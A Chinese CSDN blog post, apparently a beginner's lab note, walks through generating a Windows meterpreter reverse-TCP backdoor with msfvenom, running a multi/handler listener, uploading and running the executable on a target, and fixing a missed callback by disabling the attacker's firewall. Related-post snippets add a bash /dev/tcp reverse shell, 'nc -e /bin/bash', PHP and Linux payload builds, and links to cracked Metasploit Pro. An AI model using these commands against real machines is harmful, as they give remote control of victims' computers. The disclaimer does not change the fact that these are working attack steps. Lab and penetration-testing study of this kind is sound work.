【小白学习记】记一次msf反弹shell小错误

2quanCA11

已于 2024-06-09 20:41:01 修改

阅读量381

点赞数 12

文章标签： web安全网络安全

于 2024-06-07 09:27:11 首次发布

本文链接：https://blog.csdn.net/BeCareful0/article/details/139514619

版权

使用MSF生成后门程序，反弹shell

设置攻击机IP和端口，生成后门程序

sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=172.24.4.7 lport=4444 -f exe -o attack.exe

设置监听模块

打开 msfconsole
使用以下命令设置监听模块

msfconsole 
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.24.4.7
set lport 4444
run

在这里插入图片描述

将生成的后门程序上传到目标机上

在这里插入图片描述

运行后门程序

在这里插入图片描述

错误出现

运行后门程序后攻击机没有监听到。
经过排查后，现在是攻击机防火墙导致没有监听到

解决方法

关闭防火墙
添加入站规则
这里笔者直接选择简单粗暴的关闭防火墙（狗头保命）
成功监听到（不需要关闭目标的防火墙就可以成功）

请确保在使用这些技术时，您有权这么做，并且您的行为符合法律法规和道德准则。这些信息仅供教育和研究目的使用。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

2quanCA11

关注关注

12
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

MSF基本使用（基本结构与payload演示）

`or 1 or 不正经の泡泡

03-19

5908

文章目录前言环境基本结构基本专业术语物理结构逻辑结构使用流程渗透基本流程前言试个水（Let’s see if we can pass it）最近做一个爬虫项目，手又痒了。 MSF 是一个非常主流的渗透框架，里面包含了相当多的渗透探测模块环境 Kail 2020 VM 16 主机:Windows 10 基本要求：严格遵守国家安全法律法规，会使用Linux。基本结构基本专业术语在玩这个之前呢，我们还是需要去先了解一下一些基本的专业术语的渗透攻击（Exploit）渗透攻击是指由攻击者或者渗透测试

[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树（AST）提取

最新发布

weixin_63264424的博客

08-06

402

使用python3 -m http.server 9999命令搭建一个网页环境让步Windows端的用户方便下载木马软件，将木马软件传输到Windows系统中。进入系统以后就可以对里面的文件进行增删改查等操作。本次实验就圆满顺利完成。Windows主机地址为192，.168.30.128。在Kali中使用msfvenom命令创建生成监听木马。最后就可以成功进入Windows系统了。

msf反弹php shell,msf反弹shell - osc_u4ki5b6h的个人空间 - OSCHINA - 中文开源技术交流社区...

weixin_34230075的博客

03-22

428

今天回顾了一下msf反弹shell的操作，在这里做一下记录和分享。(￣︶￣)↗反弹shell的两种方法第一种Msfvenom实例：1、msfconsole　　　　#启动msf2、msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php　　　　#生成反弹shell文件LHOST表示本地攻击机的ip，LPO...

使用msf生成木马反弹shell（windows系统）

hmysn的博客

12-23

7233

生成木马进行植入

云服务器msf跨域反弹shell

iuyoo的博客

03-29

6016

环境部署服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放，否则可能会监听不到会话。生成木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=（公网ip） LPORT=（开放的端口） -f elf > mshell.elf 在/root目录下生成一个mshell.elf木马文件，此文件为linux系统木马利用msf攻击使用xftp将生成的木马上传进被攻击机内，这里放

渗透测试 ( 3 ) --- Metasploit Framework ( MSF )

墨鱼菜鸡

07-11

4541

白嫖 Metasploit Pro 2022：https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022：http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro：https://www.52pojie.cn/thr...

小白的靶机-VulnHub-Lampiao

wo41ge的博客

12-08

290

靶机地址，看这里一、信息收集我们在VM中需要确定攻击目标的IP地址，需要使用nmap获取目标IP地址：关于nmap的入门操作 nmap -sP 192.168.86.0/24 或者使用netdiscover获取目标IP地址我们就拿到了这次靶机的IP地址：192.168.86.160 开始探索机器。第一步是找出目标计算机上可用的开放端口和一些服务。因此我在目标计算机上启动了nmap全端口T5速度扫描： nmap -sS -sV -T5 -A -p- 192.168.86.160 目标计算机上

安全小白必看的Windows渗透基础命令大全

05-07

1578

msf渗透练习-php后门反弹

weixin_49349476的博客

06-09

2817

php后门反弹，就是通过php的后门文件，对目标进行操控。本次使用msf完成（仅供学习）

【网络安全--反弹shell】注册机捆绑恶意程序上线MSF

m0_67844671的博客

05-30

356

【网络安全--反弹shell】注册机捆绑恶意程序上线MSF 声明：郑重声明，本篇博客仅供学习与参考，若学习的内容用的不当，所产生的后果自负！！

kali在xshell环境下的msfconsole运行失败问题

Alexz__的博客

10-31

1134

shell中键入 msfconsole就是如此报错总结以上应该是msf的框架framework没有安装的问题首先别忘了更新一下国内源，进口源还是不方便，也慢 nano /etc/apt/source.list 然后把它上面写的不能删，先都注释掉，然后添加以下： deb http://mirrors.aliyun.com/kali kali-rolling main non-f...

反弹shell

stonesharp的专栏

04-03

3388

各种反弹shell的方式 - R00tGrok 时间 2014-04-06 23:27:00 博客园精华区原文 http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html [前言：在乌云社区看到反弹shell的几种姿势，考虑到乌云社区不完全对外开放，干脆自己转一下以作分享，另外还收集了点其他的，应该较为全面

内网渗透-常用反弹shell方法总结

lza20001103的博客

08-28

4753

常用反弹shell方法总结文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt

使用msf进行反弹shell+内网渗透

JSMaster01的博客

12-30

1万+

首先说明一点，反弹shell的前提是该主机能够执行我们的恶意命令反弹shell的原理与灰鸽子的原理是相似的，就是在靶机上执行一个我们msf精心构造的客户端，使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。一、反弹shell： 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例，具体命令如下：“msfveno...